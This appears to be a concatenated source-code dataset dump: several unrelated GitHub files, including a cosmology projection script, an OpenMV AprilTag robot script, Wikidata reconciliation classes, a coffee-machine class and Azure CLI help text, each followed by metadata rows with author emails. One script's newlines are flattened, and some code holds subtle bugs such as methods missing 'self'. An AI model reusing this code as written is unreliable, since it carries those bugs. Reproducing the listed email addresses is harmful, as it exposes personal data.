import sys, os import numpy as np import h5py as h5 import matplotlib.pyplot as plt # from mpl_toolkits.axes_grid1 import make_axes_locatable # import matplotlib.transforms as tfrms # import matplotlib # import matplotlib as mpl # mpl.rcParams['savefig.pad_inches'] = 0 # import palettable.cmocean.sequential as colors # list_of_colors = ['Algae', 'Amp', 'Deep', 'Dense', 'Gray', 'Haline', 'Ice', # 'Matter', 'Oxy', 'Phase', 'Solar', 'Speed', 'Tempo', 'Thermal', 'Turbid'] cosmo_dir = os.path.dirname(os.path.dirname(os.getcwd())) + '/' dataDir = cosmo_dir + 'data/' subDirectories = [x[0] for x in os.walk(cosmo_dir)] sys.path.extend(subDirectories) from load_data_cholla import load_snapshot_data, load_snapshot_data_distributed, load_snapshot_data_distributed_periodix_x from tools import * from congrid import * import scipy.ndimage cosmo_dir = os.path.dirname(os.path.dirname(os.getcwd())) + '/' subDirectories = [x[0] for x in os.walk(cosmo_dir)] sys.path.extend(subDirectories) from domain_decomposition import get_domain_block from projection_functions import rescale_image, get_rescaled_image def get_distance_factor( index, index_front, index_middle, index_b, middle_point): index_rescaled = (index) - index_middle middle_point = np.float(middle_point) slope = ( middle_point ) / index_middle - index_front if index_rescaled <= index_middle: index_rescaled = index_front + slope*index else: index_rescaled = index - index_middle + middle_point index_rescaled = np.float( index_rescaled) if index_rescaled < 1: index_rescaled = 1 return index_rescaled**(-0.8) def get_distance_factor_linear( index, index_front, index_b, value_back): value_front = 1.0 slope = ( value_back - value_front ) / (index_b - index_front) distance_factor = value_front + slope * index return distance_factor def get_transparency_factor_linear( indx, val_f, val_m, val_b, indx_f, indx_m0, indx_m1, indx_b, ): if indx <= indx_m0: slope = float(val_m - val_f) / ( indx_m0 - indx_f ) factor = val_f + slope*indx elif indx <= indx_m1: factor = val_m else: slope = float(val_b - val_m) / ( indx_b - indx_m1 ) factor = val_m + slope* (indx - indx_m1) return factor dataDir = '/data/groups/comp-astro/bruno/' # dataDir = '/gpfs/alpine/proj-shared/ast149/' nPoints = 2048 # size_front = 5120 size_front =int ( 2048 * 1.4 ) size_back = int (2048 * 0.8 ) field = 'density' inDir = dataDir + 'cosmo_sims/{0}_hydro_50Mpc/output_files_pchw18/'.format(nPoints) if field == 'density': output_dir = dataDir + 'cosmo_sims/{0}_hydro_50Mpc/projections_pchw18/dm/projections_{1}_alpha_3/'.format(nPoints,size_front) use_mpi = True if use_mpi : from mpi4py import MPI comm = MPI.COMM_WORLD rank = comm.Get_rank() nprocs = comm.Get_size() else: rank = 0 nprocs = 1 nSnap = 169 if nprocs == 1: show_progess = True else: show_progess = False if rank == 0: show_progess = True Lbox = 50000 proc_grid = [ 8, 8, 8] box_size = [ Lbox, Lbox, Lbox ] grid_size = [ 2048, 2048, 2048 ] domain = get_domain_block( proc_grid, box_size, grid_size ) n_depth = 512 # n_per_run = 1 # index_start_range = range( index*n_per_run, (index+1)*n_per_run) if rank == 0: create_directory( output_dir ) n_index_total = nPoints n_proc_snaps= (n_index_total-1) // nprocs + 1 index_start_range = np.array([ rank + i*nprocs for i in range(n_proc_snaps) ]) index_start_range = index_start_range[ index_start_range < n_index_total ] if len(index_start_range) == 0: exit() if not use_mpi: index_start_range = [0] print('Generating: {0} {1}\n'.format( rank, index_start_range)) data_type = 'particles' indx_start = 0 for i, indx_start in enumerate(index_start_range): # if indx_start > 0: continue print("Index: {0}".format(indx_start)) grid_complete_size = [ 2048, 2048, 2048 ] subgrid_x = [ indx_start, indx_start + n_depth ] subgrid_y = [ 0, 2048 ] subgrid_z = [ 0, 2048 ] subgrid = [ subgrid_x, subgrid_y, subgrid_z ] precision = np.float32 data_snapshot = load_snapshot_data_distributed_periodix_x( nSnap, inDir, data_type, field, subgrid, domain, precision, proc_grid, grid_complete_size, show_progess=show_progess ) if data_type == 'particles': current_z = data_snapshot['current_z'] if data_type == 'hydro': current_z = data_snapshot['Current_z'] data = data_snapshot[data_type][field] if field == 'density': clip_max = 2116267.2/10 clip_min = 0 data = np.clip(data, clip_min, clip_max) if show_progess: print('') size_original = ( nPoints, nPoints ) size_all = np.linspace( size_front, size_back, n_depth).astype(np.int) size_output = np.array([2160, 3840 ]) projection_color = np.zeros( size_output ) projection_distance = np.zeros( size_output ) projection_alpha = np.zeros( size_output ) distance_factor_list = [] for indx_x in range(n_depth): slice_original = data[indx_x] size_slice = size_all[indx_x] slice_rescaled = get_rescaled_image( slice_original, size_slice, size_output ) transparency_factor = get_transparency_factor_linear( indx_x, 0.0, 1.0, 0.0, 0, 180, 256, n_depth) # transparency_factor = get_transparency_factor_linear( indx_x, 0.0, 1.0, 0.0, 0, 256, 256+128, n_depth) slice_masked = slice_rescaled.copy() min_dens_mask = 1 slice_masked = np.clip( slice_masked, a_min=min_dens_mask, a_max=None) projection_alpha += np.log10(slice_masked) * transparency_factor**3 distance_factor = (transparency_factor)**(2) projection_color += slice_rescaled projection_distance += slice_rescaled * distance_factor distance_factor_list.append(distance_factor) if show_progess: terminalString = '\r Slice: {0}/{1} distance_factor:{2} transparecy:{3}'.format(indx_x, n_depth, distance_factor, transparency_factor ) sys.stdout. write(terminalString) sys.stdout.flush() if show_progess: print("") #Write the projection to a file: n_image = indx_start out_file_name = output_dir + 'projection_{2}_{3}_{0}_{1}.h5'.format( nSnap, n_image, data_type, field ) out_file = h5.File( out_file_name, 'w') out_file.attrs['current_z'] = current_z group_type = out_file.create_group( data_type ) group_field = group_type.create_group( field ) data_set = group_field.create_dataset( 'color', data= projection_color ) data_set.attrs['max'] = projection_color.max() data_set.attrs['min'] = projection_color.min() data_set = group_field.create_dataset( 'distance', data= projection_distance ) data_set.attrs['max'] = projection_distance.max() data_set.attrs['min'] = projection_distance.min() data_set = group_field.create_dataset( 'alpha', data= projection_alpha ) data_set.attrs['max'] = projection_alpha.max() data_set.attrs['min'] = projection_alpha.min() out_file.close() print("Saved File {0} / {1}: {2}\n".format(i, len(index_start_range), out_file_name ))
[ "bvillasen@gmail.com" ]
bvillasen@gmail.com
cb28bc77c7ffe7a86aca2b6068e51f22b9506545
8128a2fca39015776db33958924c823bb88794b6
/HW4_3_Apriltag/main.py
13e7b0a4eadab0a0d00f75457793037af07803ed
[]
no_license
byron936/HW4
b7767708ecf6d3a7104e8e872524241d55e38894
a8e3779accca18bf61112857a2808c7a9bfca5d7
refs/heads/master
2023-05-29T00:37:08.110145
2021-06-15T22:50:04
2021-06-15T22:50:04
374,660,852
0
0
null
null
null
null
UTF-8
Python
false
false
4,751
py
'''import pyb import math import sensor import image import time enable_lens_corr = False # turn on for straighter lines... sensor.reset() sensor.set_pixformat(sensor.RGB565) # grayscale is faster sensor.set_framesize(sensor.QQVGA) sensor.skip_frames(time=2000) clock = time.clock() # All lines also have `x1()`, `y1()`, `x2()`, and `y2()` methods to get their end-points # and a `line()` method to get all the above as one 4 value tuple for `draw_line()`. uart = pyb.UART(3, 9600, timeout_char=1000) uart.init(9600, bits=8, parity=None, stop=1, timeout_char=1000) while(True): clock.tick() img = sensor.snapshot() if enable_lens_corr: img.lens_corr(1.8) # for 2.8mm lens... # uart.write("/goStraight/run -30 \n".encode()) #time.sleep(2) #uart.write("/stop/run \n".encode()) #time.sleep(1) #uart.write("/turn/run -30 0.01 \n".encode()) #time.sleep(0.7) #uart.write("/stop/run \n".encode()) #time.sleep(1) #uart.write("/turn/run -30 -0.01 \n".encode()) #time.sleep(0.7) #uart.write("/stop/run \n".encode()) #time.sleep(1) # `merge_distance` controls the merging of nearby lines. At 0 (the default), no # merging is done. At 1, any line 1 pixel away from another is merged... and so # on as you increase this value. You may wish to merge lines as line segment # detection produces a lot of line segment results. # `max_theta_diff` controls the maximum amount of rotation difference between # any two lines about to be merged. The default setting allows for 15 degrees. for l in img.find_line_segments(merge_distance=0, max_theta_diff=5): # region = l[0] > 70 and l[0] < 130 and l[2] > 70 and l[2] < 130 and (l[1] < 40 or l[3] < 40) and (l[6] < 20 or l[6] > 160) if l.magnitude() > 20 and (l.y1() < 40 and l.y2() < 40): uart.write(("x1 %d\r\n" % l.x1()).encode()) uart.write(("x2 %d\r\n" % l.x2()).encode()) uart.write(("y1 %d\r\n" % l.y1()).encode()) uart.write(("y2 %d\r\n" % l.y2()).encode()) # img.draw_line(l.line(), color = (255, 0, 0)) # uart.write(("theta %d\r\n" % l.theta()).encode()) if l[6] < 10 or l[6] > 170: uart.write("/goStraight/run -30 \n".encode()) time.sleep(0.3) elif l[6] > 10 and l[6] < 90: uart.write("/turn/run -30 0.01 \n".encode()) elif l[6] < 170 and l[6] > 90: uart.write("/turn/run -30 -0.01 \n".encode()) time.sleep(0.3) uart.write("/stop/run \n".encode()) # uart.write(("FPShaha %f\r\n" % clock.fps()).encode())''' import sensor, image, time, math, pyb sensor.reset() sensor.set_pixformat(sensor.RGB565) sensor.set_framesize( sensor.QQVGA) # we run out of memory if the resolution is much bigger... sensor.skip_frames(time=2000) sensor.set_auto_gain(False) # must turn this off to prevent image washout... sensor.set_auto_whitebal( False) # must turn this off to prevent image washout... clock = time.clock() uart = pyb.UART(3, 9600, timeout_char=1000) uart.init(9600, bits=8, parity=None, stop=1, timeout_char=1000) f_x = (2.8 / 3.984) * 160 # find_apriltags defaults to this if not set f_y = (2.8 / 2.952) * 120 # find_apriltags defaults to this if not set c_x = 160 * 0.5 # find_apriltags defaults to this if not set (the image.w * 0.5) c_y = 120 * 0.5 # find_apriltags defaults to this if not set (the image.h * 0.5) def degrees(radians): return (180 * radians) / math.pi while (True): clock.tick() img = sensor.snapshot() for tag in img.find_apriltags(fx=f_x, fy=f_y, cx=c_x, cy=c_y): # defaults to TAG36H11 # img.draw_rectangle(tag.rect(), color = (255, 0, 0)) # img.draw_cross(tag.cx(), tag.cy(), color = (0, 255, 0)) # print_args = (tag.x_translation(), tag.y_translation(), tag.z_translation(), \ # degrees(tag.x_rotation()), degrees(tag.y_rotation()), degrees(tag.z_rotation())) # Translation units are unknown. Rotation units are in degrees. # print("Tx: %f, Ty %f, Tz %f, Rx %f, Ry %f, Rz %f" % print_args) angle = degrees(tag.y_rotation()) if angle < 180 and angle > 4: uart.write("/turn/run -20 -0.1 \n".encode()) time.sleep(0.3) uart.write("/stop/run \n".encode()) time.sleep(1) elif angle > 180 and angle < 355: uart.write("/turn/run -20 0.1 \n".encode()) time.sleep(0.3) uart.write("/stop/run \n".encode()) time.sleep(1) else: uart.write("/stop/run \n".encode()) time.sleep(1) # print(clock.fps())
[ "cm9930914@gmail.com" ]
cm9930914@gmail.com
18cb031ce6319630a87080c1a289dd048cab29ae
de328c69238b9c730781ab79bac50610bc36e53d
/wdreconcile/wikidatavalue.py
4df3de858fb6e93247823146a60dd6052bb2d42b
[ "MIT" ]
permissive
Henri-Lo/openrefine-wikidata
c6ac2870fe8f5e1210edf001ad81e233aa9bde82
5df3ee99f8658c6bb2501cadaaf8a628e18d8843
refs/heads/master
2021-01-01T18:27:13.254163
2017-07-25T18:32:19
2017-07-25T18:32:19
null
0
0
null
null
null
null
UTF-8
Python
false
false
12,008
py
import dateutil.parser from urllib.parse import urlparse, urlunparse import math from .utils import to_q, fuzzy_match_strings, match_ints, match_floats wdvalue_mapping = {} def register(cls): wdvalue_mapping[cls.value_type] = cls return cls # TODO treat somevalue and novalue differently class WikidataValue(object): """ This class represents any target value of a Wikidata claim. """ value_type = None def __init__(self, **json): self.json = json def match_with_str(self, s, item_store): """ Given a string s (the target reconciliation value), return a matching score with the WikidataValue. An ItemStore is provided to fetch information about items if needed. Scores should be returned between 0 and 100 :param s: the string to match with :param item_store: an ItemStore, to retrieve items if needed """ return 0 @classmethod def from_datavalue(self, wd_repr): """ Creates a WikidataValue from the JSON representation of a Wikibase datavalue. For now, somevalues are treated just like novalues: >>> WikidataValue.from_datavalue({'snaktype': 'somevalue', 'datatype': 'wikibase-item', 'property': 'P61'}).is_novalue() True """ typ = wd_repr['datatype'] val = wd_repr.get('datavalue', {}) # not provided for somevalue cls = wdvalue_mapping.get(typ, UndefinedValue) return cls.from_datavalue(val) def is_novalue(self): return self.json == {} def as_string(): """ String representation of the value, for the old API that only returns strings """ raise NotImplemented def as_openrefine_cell(self, lang, item_store): """ Returns a JSON representation for the OpenRefine extend API. Subclasses should reimplement _as_cell instead. :param lang: the language in which the cell should be displayed :param item_store: an ItemStore, to retrieve items if needed """ if self.is_novalue(): return {} return self._as_cell(lang, item_store) def _as_cell(self, lang, item_store): """ This method can assume that the value is not a novalue :param lang: the language in which the cell should be displayed :param item_store: an ItemStore, to retrieve items if needed """ raise NotImplemented def __getattr__(self, key): """ For convenience: """ return self.json[key] def __eq__(self, other): if isinstance(other, WikidataValue): return (other.value_type == self.value_type and other.json == self.json) return False def __ne__(self, other): return not self.__eq__(other) def __repr__(self): return ("%s(%s)" % (type(self).__name__, (",".join([key+'='+val.__repr__() for key, val in self.json.items()])))) def __hash__(self): val = (self.value_type, tuple(sorted(self.json.items(), key=lambda k:k[0]))) return val.__hash__() @register class ItemValue(WikidataValue): """ Fields: - id (string) """ value_type = "wikibase-item" @classmethod def from_datavalue(self, wd_repr): v = wd_repr.get('value') if not v: return ItemValue() else: return ItemValue(id=v.get('id')) def match_with_str(self, s, item_store): # First check if the target string looks like a Qid qid = to_q(s) if qid: return 100 if qid == self.id else 0 # Then check for a novalue match if not s and self.is_novalue(): return 100 # Otherwise try to match the string to the labels and # aliases of the item. item = item_store.get_item(self.id) labels = list(item.get('labels', {}).values()) aliases = item.get('aliases', []) matching_scores = [ fuzzy_match_strings(s, name) for name in labels+aliases ] if not matching_scores: return 0 else: return max(matching_scores) def as_string(): return self.json.get('id', '') def _as_cell(self, lang, item_store): return { 'id': self.id, 'name': item_store.get_label(self.id, lang), } @register class UrlValue(WikidataValue): """ Fields: - value (the URL itself) - parsed (by urllib) """ value_type = "url" def __init__(self, **kwargs): super(UrlValue, self).__init__(**kwargs) val = kwargs.get('value') self.parsed = None if val: try: self.parsed = urlparse(val) if not self.parsed.netloc: self.parsed = None raise ValueError self.canonical = self.canonicalize(self.parsed) except ValueError: pass def canonicalize(self, parsed): """ Take a parsed URL and returns its canonicalized form for exact matching """ return urlunparse( ('', # no scheme parsed[1], parsed[2], parsed[3], parsed[4], parsed[5])) @classmethod def from_datavalue(self, wd_repr): return UrlValue(value=wd_repr.get('value', {})) def match_with_str(self, s, item_store): # no value if self.parsed is None: return 0 # let's see if the candidate value is a URL matched_val = s try: parsed_s = urlparse(s) matched_val = self.canonicalize(parsed_s) except ValueError: pass return 100 if matched_val == self.canonical else 0 def as_string(self): return self.json.get('value', '') def _as_cell(self, lang, item_store): return { 'str': self.value } @register class CoordsValue(WikidataValue): """ Fields: - latitude (float) - longitude (float) - altitude (float) - precision (float) - globe (string) >>> int(CoordsValue(latitude=53.3175,longitude=-4.6204).match_with_str("53.3175,-4.6204", None)) 100 >>> int(CoordsValue(latitude=53.3175,longitude=-4.6204).match_with_str("53.3175,-5.6204", None)) 0 """ value_type = "globe-coordinate" @classmethod def from_datavalue(self, wd_repr): return CoordsValue(**wd_repr.get('value', {})) def match_with_str(self, s, item_store): # parse the string as coordinates parts = s.split(',') if len(parts) != 2: return 0. try: lat = float(parts[0]) lng = float(parts[1]) except ValueError: return 0. # measure the distance with the target coords # (flat earth approximation) diflat = lat - self.latitude diflng = lng - self.longitude dist = math.sqrt(diflat*diflat + diflng*diflng) dist_in_km = (dist / 180) * math.pi * 6371 # earth radius # TODO take the precision into account return 100*max(0, 1 - dist_in_km) def as_string(self): return str(self.json.get('latitude', ''))+','+str(self.json.get('longitude', '')) def _as_cell(self, lang, item_store): return { 'str': self.as_string() } @register class StringValue(WikidataValue): """ Fields: - value (string) """ value_type = "string" @classmethod def from_datavalue(cls, wd_repr): return cls( value=wd_repr.get('value', {})) def match_with_str(self, s, item_store): ref_val = self.json.get('value') if not ref_val: return 0 return fuzzy_match_strings(ref_val, s) def as_string(self): return self.json.get('value', '') def _as_cell(self, lang, item_store): return { 'str': self.value } @register class IdentifierValue(StringValue): """ Fields: - value (string) """ value_type = "external-id" def match_with_str(self, s, item_store): return 100 if s.strip() == self.value else 0 @register class QuantityValue(WikidataValue): """ Fields: - amount (float) - unit (string) """ value_type = "quantity" def __init__(self, **values): super(QuantityValue, self).__init__(**values) self.amount = values.get('amount') if self.amount is not None: self.amount = float(self.amount) @classmethod def from_datavalue(cls, wd_repr): return cls(**wd_repr.get('value', {})) def match_with_str(self, s, item_store): try: f = float(s) if self.amount is not None: return match_floats(self.amount, f) except ValueError: pass return 0 def as_string(self): return str(self.json.get('amount', '')) def is_novalue(self): return self.amount is None def _as_cell(self, lang, item_store): return { 'float': self.amount } @register class MonolingualValue(WikidataValue): """ Fields: - text (string) - language (string) """ value_type = "monolingualtext" @classmethod def from_datavalue(cls, wd_repr): return cls(**wd_repr) def match_with_str(self, s, item_store): ref_val = self.json.get('text') if not ref_val: return 0 return fuzzy_match_strings(ref_val, s) def as_string(self): return self.json.get('text') or '' def _as_cell(self, lang, item_store): return { 'str': self.text } @register class TimeValue(WikidataValue): """ Fields: - time (as iso format, with a plus in front) - parsed (as python datetime object) - timezone - before - after - precision - calglobe-coordinateendarmodel """ value_type = "time" def __init__(self, **values): super(TimeValue, self).__init__(**values) time = self.time if time.startswith('+'): time = time[1:] try: self.parsed = dateutil.parser.parse(time) except ValueError: self.parsed = None @classmethod def from_datavalue(cls, wd_repr): return cls(**wd_repr.get('value', {})) def match_with_str(self, s, item_store): # TODO convert to a timestamp # TODO compute difference # TODO convert to a ratio based on the precision return 0 def as_string(self): return str(self.json.get('time', '')) def is_novalue(self): return self.parsed is None def _as_cell(self, lang, item_store): return { 'date': self.parsed.isoformat() } @register class MediaValue(IdentifierValue): """ Fields: - value """ value_type = "commonsMedia" @register class DataTableValue(IdentifierValue): """ Fields: - value (string) """ value_type = "tabular-data" class UndefinedValue(WikidataValue): """ This is different from "novalue" (which explicitely defines an empty value. This class is for value filters which want to return an undefined value. It is purposely not registered as it does not match any Wikibase value type. (The equivalent in Wikibase would be not to state a claim at all). """ value_type = "undefined" @classmethod def from_datavalue(cls, wd_repr): return cls() def match_with_str(self, s, item_store): return 0 def is_novalue(self): return False def as_string(self): return "" def _as_cell(self, lang, item_store): return {}
[ "antonin@delpeuch.eu" ]
antonin@delpeuch.eu
1272736d3a8880723999a6aae6bed0354ffd6e63
8cff329c19482621fd4950d2f2749f495a974178
/Day16 - OOP/money_machine.py
32ef9f42d44c5aaadf80ad79690404be12032f85
[]
no_license
redoctoberbluechristmas/100DaysOfCodePython
4caee023026800cd4ab9de3c1120543bec9668db
19e68d67de39c679061dfc155488aca99d84d897
refs/heads/master
2023-07-27T05:35:51.966925
2021-09-11T16:02:49
2021-09-11T16:02:49
323,444,972
0
0
null
null
null
null
UTF-8
Python
false
false
1,280
py
class MoneyMachine: CURRENCY = "$" COIN_VALUES = { "quarters": 0.25, "dimes": 0.10, "nickles": 0.05, "pennies": 0.01 } def __init__(self): self.profit = 0 self.money_received = 0 def report(self): """Prints the current profit""" print(f"Money: {self.CURRENCY}{self.profit}") def process_coins(self): """Returns the total calculated from coins inserted.""" # Need to reset self.money_received or else change will keep increasing. self.money_received = 0 print("Please insert coins.") for coin in self.COIN_VALUES: self.money_received += int(input(f"How many {coin}?: ")) * self.COIN_VALUES[coin] return self.money_received def make_payment(self, cost): """Returns True when payment is accepted, or False if insufficient.""" self.process_coins() if self.money_received >= cost: change = round(self.money_received - cost, 2) print(f"Here is {self.CURRENCY}{change} in change.") self.profit += cost return True else: print("Sorry that's not enough money. Money refunded.") self.money_received = 0 return False
[ "redoctoberbluechristmas@protonmail.com" ]
redoctoberbluechristmas@protonmail.com
5b2179a2439730b1162882adb56bcf9da6062535
2bb90b620f86d0d49f19f01593e1a4cc3c2e7ba8
/pardus/tags/2008.1/applications/games/simutrans-waste/actions.py
9fcfaccbd3668b1ec6905a88338d406b19946b22
[]
no_license
aligulle1/kuller
bda0d59ce8400aa3c7ba9c7e19589f27313492f7
7f98de19be27d7a517fe19a37c814748f7e18ba6
refs/heads/master
2021-01-20T02:22:09.451356
2013-07-23T17:57:58
2013-07-23T17:57:58
null
0
0
null
null
null
null
UTF-8
Python
false
false
627
py
#!/usr/bin/python # -*- coding: utf-8 -*- # # Licensed under the GNU General Public License, version 2. # See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt from pisi.actionsapi import shelltools from pisi.actionsapi import pisitools import os def fixperms(d): for root, dirs, files in os.walk(d): for name in dirs: shelltools.chmod(os.path.join(root, name), 0755) for name in files: shelltools.chmod(os.path.join(root, name), 0644) WorkDir = "simutrans" NoStrip = "/" def install(): fixperms("pak") pisitools.insinto("/usr/share/simutrans/pak", "pak/*")
[ "yusuf.aydemir@istanbul.com" ]
yusuf.aydemir@istanbul.com
7a2568b90975aa483686fc1009ae279abc99eaf3
50cd3151800fc03c3db208e6e48e3e04a788ea42
/msgraph-cli-extensions/src/notes/azext_notes/generated/_help.py
e0b33cf8f597cbaaaddafecb124637bf587c9a66
[ "MIT" ]
permissive
isabella232/msgraph-cli
ba761b1047f9b71fd6b86fa1feedc4a949602eeb
de2e0381ec29e6e0cd7ab47d75f4e7e80e1c1e2b
refs/heads/main
2023-01-21T09:22:13.246565
2020-10-12T13:55:28
2020-10-12T13:55:28
null
0
0
null
null
null
null
UTF-8
Python
false
false
986,960
py
# -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- # pylint: disable=too-many-lines from knack.help_files import helps helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property onenote for groups" """ helps['notes get-onenote'] = """ type: command short-summary: "Get onenote from groups" """ helps['notes update-onenote'] = """ type: command short-summary: "Update the navigation property onenote in groups" parameters: - name: --resources short-summary: "The image and other file resources in OneNote pages. Getting a resources collection is not \ supported, but you can get the binary content of a specific resource. Read-only. Nullable." long-summary: | Usage: --resources content=XX content-url=XX self=XX id=XX content: The content stream content-url: The URL for downloading the content self: The endpoint where you can get details about the page. Read-only. id: Read-only. Multiple actions can be specified by using more than one --resources argument. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for groups" """ helps['notes create-notebook'] = """ type: command short-summary: "Create new navigation property to notebooks for groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes create-operation'] = """ type: command short-summary: "Create new navigation property to operations for groups" parameters: - name: --error short-summary: "onenoteOperationError" long-summary: | Usage: --error code=XX message=XX code: The error code. message: The error message. """ helps['notes create-page'] = """ type: command short-summary: "Create new navigation property to pages for groups" """ helps['notes create-resource'] = """ type: command short-summary: "Create new navigation property to resources for groups" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for groups" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-notebook'] = """ type: command short-summary: "Get notebooks from groups" """ helps['notes get-operation'] = """ type: command short-summary: "Get operations from groups" """ helps['notes get-page'] = """ type: command short-summary: "Get pages from groups" """ helps['notes get-resource'] = """ type: command short-summary: "Get resources from groups" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes list-notebook'] = """ type: command short-summary: "Get notebooks from groups" """ helps['notes list-operation'] = """ type: command short-summary: "Get operations from groups" """ helps['notes list-page'] = """ type: command short-summary: "Get pages from groups" """ helps['notes list-resource'] = """ type: command short-summary: "Get resources from groups" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes update-notebook'] = """ type: command short-summary: "Update the navigation property notebooks in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-operation'] = """ type: command short-summary: "Update the navigation property operations in groups" parameters: - name: --error short-summary: "onenoteOperationError" long-summary: | Usage: --error code=XX message=XX code: The error code. message: The error message. """ helps['notes update-page'] = """ type: command short-summary: "Update the navigation property pages in groups" """ helps['notes update-resource'] = """ type: command short-summary: "Update the navigation property resources in groups" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in groups" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show 